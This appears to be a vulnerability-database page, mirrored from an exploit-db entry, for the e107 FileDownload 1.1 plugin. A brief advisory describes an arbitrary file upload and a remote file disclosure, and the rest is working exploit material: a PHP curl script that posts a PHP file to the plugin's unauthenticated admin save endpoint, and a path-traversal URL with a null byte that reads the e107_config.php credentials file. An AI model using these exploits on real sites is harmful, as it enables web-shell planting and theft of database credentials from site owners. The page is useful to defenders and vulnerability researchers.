e107 Filedownload Plugin - Arbitrary File Upload / Remote File Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1063875 漏洞类型
发布时间 2012-06-19 更新时间 2012-06-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/37434
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/54098/info

The FileDownload Plugin for e107 is prone to an arbitrary file-upload vulnerability and a remote file-disclosure vulnerability because the application fails to adequately sanitize user-supplied input.

An attacker can exploit these issues to upload a file and view local files in the context of the web server process, which may aid in further attacks.

FileDownload 1.1 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$ch = curl_init("http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/save.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
               array('filename'=>'lo.php',
          'accesses'=>'<?php phpinfo(); ?>'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00